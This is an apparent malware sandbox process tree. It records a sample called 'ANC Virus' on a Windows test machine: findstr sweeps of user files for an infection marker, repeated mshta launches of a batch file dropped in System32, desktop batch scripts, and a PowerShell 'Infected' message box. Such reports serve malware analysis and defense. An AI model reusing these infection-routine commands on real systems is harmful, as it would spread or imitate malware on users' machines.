C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\BlockSearch.pub"16⤵PID:1380
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\CompressSkip.xlsx"16⤵PID:5932
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ConvertUndo.xltm"16⤵PID:5796
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\DenyBlock.pot"16⤵PID:4740
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\DenyDisable.vsdm"16⤵PID:3152
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\DenyJoin.pptm"16⤵PID:3280
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\DisableResize.xlsb"16⤵PID:536
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ExportReceive.pub"16⤵PID:3384
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\FindProtect.dot"16⤵PID:1532
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\GrantImport.xlsm"16⤵PID:3320
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\HideReceive.htm"16⤵PID:664
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\MeasureDebug.pptx"16⤵PID:5748
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\MeasurePing.ods"16⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1828
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\MergePush.vdx"16⤵PID:4996
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\MountMerge.pptm"16⤵PID:6040
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\MountPop.odp"16⤵PID:5988
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\OutTest.dot"16⤵PID:5992
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\RedoApprove.pot"16⤵PID:5076
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\RenameMerge.vstx"16⤵PID:3804
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\RepairWait.ods"16⤵PID:3136
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ResizeInitialize.xlsx"16⤵PID:6076
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ResolveSuspend.dot"16⤵PID:5372
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ResumeJoin.csv"16⤵PID:4588
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\RevokeRead.vdw"16⤵PID:5092
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SaveDebug.odt"16⤵PID:4208
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SearchExport.vsdm"16⤵PID:5940
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SearchStop.vsdm"16⤵PID:5824
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SetSync.odp"16⤵PID:2300
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ShowStop.vdx"16⤵PID:4040
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SkipExport.pptx"16⤵PID:4648
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SkipRestore.pdf"16⤵PID:2332
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\StepConnect.mht"16⤵PID:900
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SuspendUnprotect.txt"16⤵PID:1340
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\UndoInitialize.xlsb"16⤵PID:3676
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\UninstallGet.txt"16⤵PID:5716
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\UnpublishLock.pptm"16⤵PID:2124
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\WriteLimit.ods"16⤵PID:5816
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\OneNote Notebooks\Quick Notes.one"16⤵PID:3432
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2"16⤵PID:2752
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\Quick Notes.one"16⤵PID:936
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\CloseNew.rm"16⤵PID:2112
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\CopyImport.ADTS"16⤵PID:1976
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\DebugSend.cab"16⤵PID:768
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\DebugSplit.rtf"16⤵PID:3124
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\DenyWait.xml"16⤵PID:4844
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\FindCompress.xht"16⤵PID:1580
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\LimitExit.mht"16⤵PID:4948
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\NewBlock.mpeg"16⤵PID:1156
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\NewPublish.temp"16⤵PID:1632
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\ReceiveRedo.ico"16⤵PID:3548
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\RegisterDismount.kix"16⤵PID:5008
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\RequestClose.ttc"16⤵PID:1720
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\ResetExpand.jfif"16⤵PID:2188
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\SearchClear.wma"16⤵PID:4472
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\SearchMerge.xla"16⤵PID:4848
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\StepShow.html"16⤵PID:5580
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\UnblockCheckpoint.ico"16⤵PID:244
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\UnregisterProtect.ram"16⤵PID:248
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\BackupDismount.eps"16⤵PID:224
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\BackupUndo.emf"16⤵PID:2732
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ClearLock.cr2"16⤵PID:3852
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ClearMount.dib"16⤵PID:4684
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\CompleteUnprotect.dxf"16⤵PID:4876
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\CompressSkip.dib"16⤵PID:5936
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ConvertFromExport.jpg"16⤵PID:3036
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ConvertFromSkip.eps"16⤵PID:5212
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ConvertToNew.raw"16⤵PID:5332
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\DebugMerge.dib"16⤵PID:5224
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\EditSubmit.eps"16⤵PID:460
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\EnterRename.tiff"16⤵PID:1756
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ExportOut.wmf"16⤵PID:1820
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ExportUninstall.gif"16⤵PID:5764
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\GetLimit.emf"16⤵PID:5176
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\GroupRevoke.emz"16⤵PID:1380
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\InstallResize.wmf"16⤵PID:5932
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\LockDisconnect.raw"16⤵PID:5568
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\MoveDismount.raw"16⤵PID:3012
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\My Wallpaper.jpg"16⤵PID:3512
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\PushHide.emz"16⤵PID:3280
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\RemoveCompare.tiff"16⤵PID:2612
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\RepairUnregister.eps"16⤵PID:3384
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ResolveWrite.bmp"16⤵PID:1532
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\SaveOpen.emz"16⤵PID:3004
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\SearchInvoke.png"16⤵PID:480
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\StartEnter.raw"16⤵PID:5748
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\StepUninstall.jpeg"16⤵PID:1168
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\SubmitResolve.png"16⤵PID:1840
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\SuspendShow.bmp"16⤵PID:2608
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\TestRestart.svg"16⤵PID:6048
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\UndoSkip.eps"16⤵PID:5992
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\UninstallClear.dwg"16⤵PID:756
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\UninstallResolve.svg"16⤵PID:2256
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\AssertPush.zip"16⤵PID:4164
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\AssertUndo.au3"16⤵PID:244
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ClearSuspend.ppsm"16⤵PID:248
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ClearWait.mp3"16⤵PID:224
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\CompareRepair.xltx"16⤵PID:2732
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ConfirmCopy.svg"16⤵PID:3852
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ConnectInstall.mp3"16⤵PID:4684
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ConnectLimit.tiff"16⤵PID:4876
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ConvertToOpen.fon"16⤵PID:5936
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\DisconnectDisable.zip"16⤵PID:3036
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\EditOut.xml"16⤵PID:5212
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ExitOpen.vsdx"16⤵PID:5332
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ExpandAdd.aiff"16⤵PID:5224
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ExportConvertTo.clr"16⤵PID:460
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\GetUninstall.xltm"16⤵PID:1756
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\GroupExport.snd"16⤵PID:1820
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\LockApprove.asf"16⤵PID:5764
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\MountEnter.css"16⤵PID:5176
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\MountResolve.wax"16⤵PID:3736
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\MoveHide.mid"16⤵PID:5548
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\PushWrite.wmv"16⤵PID:4168
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ReadSkip.m1v"16⤵PID:3180
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ReceiveWatch.php"16⤵PID:2800
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\RepairResize.html"16⤵PID:3096
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SaveDeny.jpg"16⤵PID:4784
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SearchBlock.mp2v"16⤵PID:4200
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SearchStart.png"16⤵PID:2340
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SendDismount.emf"16⤵PID:3104
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SetConvert.asp"16⤵PID:3024
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SplitCopy.xml"16⤵PID:1632
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SwitchDisconnect.jpg"16⤵PID:4916
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SwitchStop.ps1"16⤵PID:4732
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\UndoInitialize.ppsm"16⤵PID:2308
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\UnregisterWatch.i64"16⤵PID:2056
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\WaitPublish.xht"16⤵PID:2712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "[reflection.assembly]::LoadWithPartialName('System.Windows.Forms')|out-null;[windows.forms.messagebox]::Show('Infected with ANC Virus')"16⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4396
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\mshta.exemshta.exe "C:\Windows\System32\balls.bat"4⤵PID:852
-
-
C:\Windows\system32\mshta.exemshta.exe "C:\Windows\System32\balls.bat"4⤵PID:2536
-
-
C:\Windows\system32\mshta.exemshta.exe "C:\Windows\System32\balls.bat"4⤵PID:2392
-
-
C:\Windows\system32\mshta.exemshta.exe "C:\Windows\System32\balls.bat"4⤵PID:2812
-
-
C:\Windows\system32\mshta.exemshta.exe "C:\Windows\System32\balls.bat"4⤵PID:1556
-
-
C:\Windows\system32\mshta.exemshta.exe "C:\Windows\System32\balls.bat"4⤵PID:3864
-
-
C:\Windows\system32\mshta.exemshta.exe "C:\Windows\System32\balls.bat"4⤵PID:1092
-
-
C:\Windows\system32\mshta.exemshta.exe "C:\Windows\System32\balls.bat"4⤵PID:2792
-
-
C:\Windows\system32\mshta.exemshta.exe "C:\Windows\System32\balls.bat"4⤵PID:4776
-
-
C:\Windows\system32\mshta.exemshta.exe "C:\Windows\System32\balls.bat"4⤵PID:2628
-
-
C:\Windows\system32\mshta.exemshta.exe "C:\Windows\System32\balls.bat"4⤵PID:3564
-
-
C:\Windows\system32\mshta.exemshta.exe "C:\Windows\System32\balls.bat"4⤵PID:2760
-
-
C:\Windows\system32\mshta.exemshta.exe "C:\Windows\System32\balls.bat"4⤵PID:2328
-
-
C:\Windows\system32\mshta.exemshta.exe "C:\Windows\System32\balls.bat"4⤵PID:1492
-
-
C:\Windows\system32\mshta.exemshta.exe "C:\Windows\System32\balls.bat"4⤵PID:720
-
-
C:\Windows\system32\mshta.exemshta.exe "C:\Windows\System32\balls.bat"4⤵PID:1012
-
-
C:\Windows\system32\mshta.exemshta.exe "C:\Windows\System32\balls.bat"4⤵PID:2856
-
-
C:\Windows\system32\mshta.exemshta.exe "C:\Windows\System32\balls.bat"4⤵PID:2484
-
-
C:\Windows\system32\mshta.exemshta.exe "C:\Windows\System32\balls.bat"4⤵PID:2052
-
-
C:\Windows\system32\mshta.exemshta.exe "C:\Windows\System32\balls.bat"4⤵PID:1400
-
-
C:\Windows\system32\mshta.exemshta.exe "C:\Windows\System32\balls.bat"4⤵PID:644
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\UnregisterStop.bat" "1⤵PID:4688
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\StepGrant.bat" "1⤵PID:2732
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ResizeUnlock.bat" "1⤵PID:5972
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ProtectLimit.bat" "1⤵PID:5348
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ConvertFromPing.bat" "1⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1760
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ClearLimit.bat" "1⤵PID:1700
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\PingShow.bat" "1⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5224
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ResizeClose.bat" "1⤵PID:880
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:2436 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x2f8,0x7fffd42cf208,0x7fffd42cf214,0x7fffd42cf2202⤵PID:1612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1832,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=2264 /prefetch:112⤵PID:6052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2236,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=2232 /prefetch:22⤵PID:2664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2552,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=2568 /prefetch:132⤵PID:3096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3444,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=3644 /prefetch:12⤵PID:200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3452,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=3728 /prefetch:12⤵PID:2284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4968,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=4888 /prefetch:12⤵PID:5972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5032,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:142⤵PID:2612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4992,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:142⤵PID:2040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6156,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=6180 /prefetch:142⤵PID:2548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6192,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=6204 /prefetch:142⤵PID:4904
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.execookie_exporter.exe --cookie-json=11403⤵PID:2636
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6156,i,256462842304657596,12440691788811581563,262144 --variations-seed-version --mojo-platform-channel-handle=6180 /prefetch:142⤵PID:228
-
-
